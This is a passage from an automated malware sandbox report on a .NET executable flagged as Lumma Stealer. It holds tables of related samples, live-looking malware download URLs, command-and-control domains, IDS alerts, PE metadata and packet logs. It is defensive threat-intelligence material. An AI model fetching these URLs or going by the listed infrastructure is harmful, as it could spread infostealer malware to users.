                          • 147.45.44.131/files/990.exe
                          SecuriteInfo.com.Win32.PWSX-gen.29050.19153.exeGet hashmaliciousLummaCBrowse
                          • 147.45.44.131/files/ypqhgl.exe
                          SecuriteInfo.com.Win32.MalwareX-gen.17062.12418.exeGet hashmaliciousLummaCBrowse
                          • 147.45.44.131/files/otqp9.exe
                          ctEj2vV40S.exeGet hashmaliciousLummaCBrowse
                          • 147.45.44.131/files/jrj6.exe
                          SecuriteInfo.com.Heuristic.HEUR.AGEN.1313656.13208.30309.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                          • 147.45.44.131/files/ponos.exe
                          Kpmg.exeGet hashmaliciousLummaCBrowse
                          • 147.45.44.131/files/ywp.exe
                          188.114.97.3updater.exeGet hashmaliciousUnknownBrowse
                          • microsoft-rage.world/Api/v3
                          http://www.pro-pharma.co.ukGet hashmaliciousUnknownBrowse
                          • proph.co.uk/blog/
                          DHL documents_PDF.exeGet hashmaliciousFormBookBrowse
                          • www.hindo.top/b31a/?xVJtG4Qx=NzSChTKNjjtA9oOpLl4rXJIvEV3PrPKyZnQBhjSYE3dzUwTxd/TkmyQCL+Cn4jVtP9cc&9rT=ndrxUr
                          PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                          • www.chinaen.org/mquw/
                          QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/TX2daF45/download
                          QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/mCJwtLTf/download
                          QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/KiyXDELa/download
                          QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                          • filetransfer.io/data-package/mCJwtLTf/download
                          QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • filetransfer.io/data-package/G1NY5FRK/download
                          SwiftMesaj.pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                          • vlha.shop/LP341/index.php

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          miracledzmnqwui.shopctEj2vV40S.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          Selenium.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          SecuriteInfo.com.Trojan.InjectNET.17.22811.18368.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          SecuriteInfo.com.Trojan.InjectNET.17.22463.10190.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          SecuriteInfo.com.Trojan.InjectNET.17.16891.19765.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          SecuriteInfo.com.Trojan.InjectNET.17.11380.16691.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          Selenium.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          SecuriteInfo.com.Trojan.InjectNET.17.9325.13976.exeGet hashmaliciousLummaCBrowse
                          • 188.114.96.3
                          SecuriteInfo.com.Trojan.InjectNET.17.28316.12072.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          steamcommunity.comHkJrUQS8Oh.exeGet hashmaliciousLummaCBrowse
                          • 23.197.127.21
                          SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                          • 23.197.127.21
                          SecuriteInfo.com.Win32.MalwareX-gen.17062.12418.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.197.127.21
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.197.127.21
                          steppyplantnw.shopHkJrUQS8Oh.exeGet hashmaliciousLummaCBrowse
                          • 172.67.191.81

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSMeenakshi pdf lnk.lnkGet hashmaliciousUnknownBrowse
                          • 104.26.9.129
                          HkJrUQS8Oh.exeGet hashmaliciousLummaCBrowse
                          • 172.67.191.81
                          SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                          • 104.26.0.231
                          SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                          • 172.67.74.161
                          SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                          • 172.67.68.212
                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                          • 104.21.64.194
                          SecuriteInfo.com.Win32.PWSX-gen.29050.19153.exeGet hashmaliciousLummaCBrowse
                          • 172.67.173.81
                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                          • 172.67.187.100
                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                          • 104.21.64.194
                          SPW AW25 - PO.010 SMS.exeGet hashmaliciousAgentTeslaBrowse
                          • 172.67.74.152
                          CLOUDFLARENETUSMeenakshi pdf lnk.lnkGet hashmaliciousUnknownBrowse
                          • 104.26.9.129
                          HkJrUQS8Oh.exeGet hashmaliciousLummaCBrowse
                          • 172.67.191.81
                          SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                          • 104.26.0.231
                          SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                          • 172.67.74.161
                          SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeGet hashmaliciousNetSupport RATBrowse
                          • 172.67.68.212
                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                          • 104.21.64.194
                          SecuriteInfo.com.Win32.PWSX-gen.29050.19153.exeGet hashmaliciousLummaCBrowse
                          • 172.67.173.81
                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                          • 172.67.187.100
                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                          • 104.21.64.194
                          SPW AW25 - PO.010 SMS.exeGet hashmaliciousAgentTeslaBrowse
                          • 172.67.74.152
                          AKAMAI-ASUSSecuriteInfo.com.Win32.MalwareX-gen.17062.12418.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          SecuriteInfo.com.FileRepMalware.26149.11274.exeGet hashmaliciousLummaCBrowse
                          • 23.192.247.89
                          https://u.to/G3PhIAGet hashmaliciousUnknownBrowse
                          • 23.55.224.97
                          https://jwcattlerancch-my.sharepoint.com/:f:/g/personal/djohnston_cimarrontank_com/EoDAqq6yNx5AqyoqJLpNz-kBNs8XZ01jWsT6VlgzEAPfYg?e=2yscZg&xsdata=MDV8MDJ8ZG91Zy5kcmF5QGVuZXJwYWMuY29tfDRlNmYwZTY5YTc5ZTRiMjI2NWMyMDhkY2Q5ODA3MzJifDE2MDJhZTgyMDI2NjQwZDY5MTBiMTE2ODBmZTBmNmE1fDB8MHw2Mzg2MjQzOTQ0Mzc0NDMyNjB8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDQwMDAwfHx8&sdata=dHpBSDIvMm9nbWhwc0hUWHpPcFhjMlVnUUx4bEZMK09sN1dUUXdQdC80MD0%3dGet hashmaliciousHTMLPhisherBrowse
                          • 2.19.126.84
                          (0119)SOA___pay,ment.htmGet hashmaliciousHTMLPhisherBrowse
                          • 23.38.98.96
                          https://web.kamihq.com/Get hashmaliciousUnknownBrowse
                          • 2.19.126.135
                          FREE-NET-ASFREEnetEUSecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                          • 193.233.255.84
                          file.exeGet hashmaliciousRedLineBrowse
                          • 193.233.255.84
                          SecuriteInfo.com.Win32.PWSX-gen.29050.19153.exeGet hashmaliciousLummaCBrowse
                          • 147.45.44.131
                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                          • 147.45.44.131
                          SecuriteInfo.com.Win32.MalwareX-gen.17062.12418.exeGet hashmaliciousLummaCBrowse
                          • 147.45.44.131
                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                          • 147.45.44.131
                          SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                          • 147.45.44.104
                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                          • 147.45.44.131
                          SecuriteInfo.com.Win32.PWSX-gen.29050.19153.exeGet hashmaliciousLummaCBrowse
                          • 147.45.44.131
                          SecuriteInfo.com.Win32.MalwareX-gen.17062.12418.exeGet hashmaliciousLummaCBrowse
                          • 147.45.44.131

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          a0e9f5d64349fb13191bc781f81f42e1HkJrUQS8Oh.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          • 92.122.104.90
                          • 104.21.20.40
                          lOT2jncAv8.docGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          • 92.122.104.90
                          • 104.21.20.40
                          kO1hlkAOgD.docGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          • 92.122.104.90
                          • 104.21.20.40
                          SecuriteInfo.com.Win32.Evo-gen.12679.2695.exeGet hashmaliciousAmadey, StealcBrowse
                          • 188.114.97.3
                          • 92.122.104.90
                          • 104.21.20.40
                          SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                          • 188.114.97.3
                          • 92.122.104.90
                          • 104.21.20.40
                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          • 92.122.104.90
                          • 104.21.20.40
                          SecuriteInfo.com.Win32.PWSX-gen.29050.19153.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          • 92.122.104.90
                          • 104.21.20.40
                          SecuriteInfo.com.Win32.MalwareX-gen.17062.12418.exeGet hashmaliciousLummaCBrowse
                          • 188.114.97.3
                          • 92.122.104.90
                          • 104.21.20.40
                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          • 92.122.104.90
                          • 104.21.20.40
                          SecuriteInfo.com.Trojan.GenericKD.74160014.23999.32537.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          • 92.122.104.90
                          • 104.21.20.40

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AD3SI7tuzs.exe.log

                          Download File
                          Process:C:\Users\user\Desktop\AD3SI7tuzs.exe
                          File Type:CSV text
                          Category:dropped
                          Size (bytes):847
                          Entropy (8bit):5.345615485833535
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                          MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                          SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                          SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                          SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                          Malicious:true
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):5.218145145231534
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:AD3SI7tuzs.exe
                          File size:14'336 bytes
                          MD5:c9298899bde5efb635d28f14a6c62125
                          SHA1:d8962520ab3b97555a757cf1e1d84bb1450c81db
                          SHA256:5ab9529b4ef0010efeadbca8251f1708cdca5a80750e0d4f842464369a342ed0
                          SHA512:975e0afb22fe182aba3028b9dea1a17a39c6faea666c6624242bd6dd3777d98587cc9a67460f08e4f91d064fc31d3f3f7f7a7e3ef8b2d0314aeef93b8924720e
                          SSDEEP:384:9DtTXkmazUdOsR9VxeFpFb+iQIQRJqj5MqaeFJV9/n:9h7/6Uad1QHqBT/
                          TLSH:BC523C581BD8483AFEAA1EBDA8E343018A73F75E5503F72F1C9C50992D8276055F136A
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."............."...0..............L... ...`....@.. ....................................`................................

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0x404cc6
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0xD816DB22 [Sat Nov 18 09:02:26 2084 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                          Entrypoint Preview

                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x4c710x4f.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x5cc.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x4bd00x38.text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x2ccc0x2e00024cd33f14074b58ef8c415a7a6bdefcFalse0.47477921195652173data5.511651193189767IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x60000x5cc0x600fea80c03178fc0dd78c3b4db1f09a417False0.4192708333333333data4.117373895955984IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x80000xc0x200658905ad537379efc9d674fdc42ca684False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_VERSION0x60900x33cdata0.4190821256038647
                          RT_MANIFEST0x63dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                          Imports

                          DLLImport
                          mscoree.dll_CorExeMain

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-09-21T15:15:04.865477+02002055377ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (miracledzmnqwui .shop)1192.168.2.5553061.1.1.153UDP
                          2024-09-21T15:15:05.390590+02002055378ET MALWARE Observed Lumma Stealer Related Domain (miracledzmnqwui .shop in TLS SNI)1192.168.2.549705188.114.97.3443TCP
                          2024-09-21T15:15:06.180806+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705188.114.97.3443TCP
                          2024-09-21T15:15:06.180806+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.97.3443TCP
                          2024-09-21T15:15:06.188727+02002055479ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)1192.168.2.5639521.1.1.153UDP
                          2024-09-21T15:15:06.201027+02002055483ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)1192.168.2.5614261.1.1.153UDP
                          2024-09-21T15:15:06.213096+02002055475ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop)1192.168.2.5597981.1.1.153UDP
                          2024-09-21T15:15:06.225372+02002055477ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop)1192.168.2.5528561.1.1.153UDP
                          2024-09-21T15:15:06.237314+02002055480ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop)1192.168.2.5498671.1.1.153UDP
                          2024-09-21T15:15:06.248550+02002055481ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop)1192.168.2.5568511.1.1.153UDP
                          2024-09-21T15:15:06.260773+02002055482ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop)1192.168.2.5508021.1.1.153UDP
                          2024-09-21T15:15:06.273590+02002055474ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop)1192.168.2.5636781.1.1.153UDP
                          2024-09-21T15:15:09.430729+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549707104.21.20.40443TCP
                          2024-09-21T15:15:09.430729+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549707104.21.20.40443TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 21, 2024 15:15:03.732398987 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:03.737734079 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:03.737840891 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:03.742074966 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:03.747101068 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.378853083 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.378876925 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.378889084 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.379000902 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.379283905 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.379342079 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.379451990 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.379774094 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.379786015 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.379797935 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.379810095 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.379812002 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.379842997 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.380289078 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.380327940 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.384749889 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.384763956 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.384814024 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.384882927 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.429296970 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.469443083 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.469557047 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.469569921 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.469621897 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.474206924 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.474220037 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.474255085 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.474432945 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.474446058 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.474474907 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.479013920 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.479027033 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.479069948 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.479249001 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.479260921 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.479301929 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.483791113 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.483804941 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.483820915 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.483844995 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.483870029 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.483987093 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.483999968 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.484035969 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.488527060 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.488540888 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.488579035 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.488753080 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.488765955 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.488809109 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.493372917 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.493387938 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.493397951 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.493436098 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.538717031 CEST4970480192.168.2.5147.45.44.131
                          Sep 21, 2024 15:15:04.559937954 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.559997082 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.560007095 CEST8049704147.45.44.131192.168.2.5
                          Sep 21, 2024 15:15:04.560116053 CEST4970480192.168.2.5147.45.44.131
